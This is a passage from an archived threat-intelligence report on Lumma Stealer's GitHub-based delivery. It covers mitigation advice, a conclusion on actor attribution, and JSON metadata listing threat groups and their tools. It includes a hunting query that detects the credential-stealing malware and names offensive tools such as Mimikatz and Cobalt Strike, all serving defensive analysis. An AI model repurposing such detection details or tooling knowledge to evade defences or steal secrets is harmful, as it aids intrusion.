links and attachments in unsolicited emails, even if they appear legitimate. Hover over links to\r\ncheck their actual destination before clicking.\r\nRegularly check the validity of digital certificates for executables to ensure they haven't been revoked.\r\nUse endpoint security solutions that can detect and prevent unauthorized execution of shell commands such as those\r\nused by Lumma Stealer for reconnaissance or data exfiltration.\r\nIdentify and block communication with known malicious IP addresses and enforce strict firewall rules to mitigate\r\nC\u0026C communication, and monitor unusual outbound traffic\r\nTrain employees to recognize phishing emails, malicious websites, and social engineering tactics that may lead to\r\nmalware infections.\r\nhttps://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html\r\nPage 13 of 15\n\nConsider partnering with an MDR provider to gain access to specialized expertise and real-time threat detection,\r\nanalysis, and containment capabilities to minimize the impact of infections.\r\nIncorporate threat intelligence into your security posture using tools like Trend Vision One for improved detection\r\nand attribution of attacks to specific threat actors or campaigns.\r\nRegularly patch operating systems, browsers, and third-party applications to close vulnerabilities that could be\r\nexploited during attacks.\r\nEnable Multi-Factor Authentication (MFA) on all accounts. This limits the impact of stolen credentials.\r\nAdopt a zero-trust approach.  Implement a “never trust, always verify” philosophy for users, code, links, and third-party integrations to reduce exposure to potential threats.\r\nTrend Vision One\r\nTrend Vision Oneone-platform is a cybersecurity platform that simplifies security and helps enterprises detect and stop\r\nthreats faster by consolidating multiple security capabilities, enabling greater command of the enterprise’s attack surface,\r\nand providing complete visibility into its cyber risk posture. The cloud-based platform leverages AI and threat intelligence\r\nfrom 250 million sensors and 16 threat research centers around the globe to provide comprehensive risk insights, earlier\r\nthreat detection, and automated risk and threat response options in a single solution.\r\nTrend Vision One Threat Intelligence\r\nTo stay ahead of evolving threats, Trend Vision One customers can access a range of Intelligence Reports and Threat\r\nInsights within Vision One. Threat Insights helps customers stay ahead of cyber threats before they happen and allows them\r\nto prepare for emerging threats by offering comprehensive information on threat actors, their malicious activities, and their\r\ntechniques. By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks,\r\nand effectively respond to threats.\r\nLumma Stealer's GitHub-Based Delivery Explored via Managed Detection and Response\r\nEmerging Threats: Lumma Stealer’s GitHub-Based Delivery Explored via Managed Detection and Response\r\nThreat Actor:  Water Kurita\r\nHunting queries\r\nTrend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post\r\nusing data within their environment.   \r\nmalName:*LUMMASTEALER* AND eventName:MALWARE_DETECTION AND LogType: detection\r\nMore hunting queries are available for Vision One customers with Threat Insights Entitlement enabledproducts.\r\nConclusion\r\nThe distribution method of Lumma Stealer continues to evolve, with the threat actor now using GitHub repositories to host\r\nmalware. The Malware-as-a-Service (MaaS) model provides malicious actors with a cost-effective and accessible means to\r\nexecute complex cyberattacks and achieve their malicious objectives, easing the distribution of threats such as Lumma\r\nStealer.\r\nThe delivery of multiple threats such as SectopRAT, Vidar, and Cobeacon suggest that its perpetrators are taking a modular\r\napproach to their attacks. Future Lumma Stealer variants could include dynamically downloaded modules, enabling\r\nmalicious actors to tailor payloads based on the victim’s system or industry. This could lead to more targeted attacks or even\r\nthe introduction of new capabilities, such as ransomware, espionage, or cryptocurrency mining.\r\nThe campaign discussed in this blog entry aligns closely with tactics attributed to the Stargazer Goblin group, possibly\r\nindicating their involvement, despite some variations in infection chain order, URL structures, and the use of multiple\r\npayloads.\r\nThe role of Managed XDR in uncovering tactics, techniques, and procedures, as demonstrated in this recent incident\r\ninvestigation, highlights its critical importance for organizations. By investigating files downloaded from apparently\r\nlegitimate sources like GitHub, the Managed XDR team was able to identify this threat and protect customers. This allowed\r\nthe team to take swift action on affected machines to prevent further damage. Additionally, the integration of cyber threat\r\nintelligence proved invaluable, as attributing the threat to the group Star Goblin enabled the team to understand the\r\nmalicious actor’s methods and anticipate other potential attacks.\r\nManaged XDR employs expert analytics to process extensive data gathered from various Trend technologies. By using\r\nadvanced AI and security analytics, it can correlate information from customer environments and global threat intelligence,\r\nproducing more precise alerts and enabling faster threat detection.\r\nhttps://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html\r\nPage 14 of 15\n\nIndicators of Compromise\r\nThe indicators of compromise for this entry can be found here.\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html\r\nhttps://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MITRE" ], "references": [ "https://www.trendmicro.com/en_us/research/25/a/lumma-stealers-github-based-delivery-via-mdr.html" ], "report_names": [ "lumma-stealers-github-based-delivery-via-mdr.html" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "5be99bea-0f77-492b-be61-e7cc225bbff4", "created_at": "2026-03-08T02:00:03.473966Z", "updated_at": "2026-04-10T02:00:03.983164Z", "deleted_at": null, "main_name": "Water Kurita", "aliases": [], "source_name": "MISPGALAXY:Water Kurita", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e8dd54ac-a3fa-4496-8b17-a9360ad13927", "created_at": "2024-07-28T02:00:04.686094Z", "updated_at": "2026-04-10T02:00:03.680897Z", "deleted_at": null, "main_name": "Stargazer Goblin", "aliases": [], "source_name": "MISPGALAXY:Stargazer Goblin", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434388, "ts_updated_at": 1775792207, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/0d645c4d3da53df7d1923854d03d98668c82db59.pdf", "text": "https://archive.orkl.eu/0d645c4d3da53df7d1923854d03d98668c82db59.txt", "img": "https://archive.orkl.eu/0d645c4d3da53df7d1923854d03d98668c82db59.jpg" } }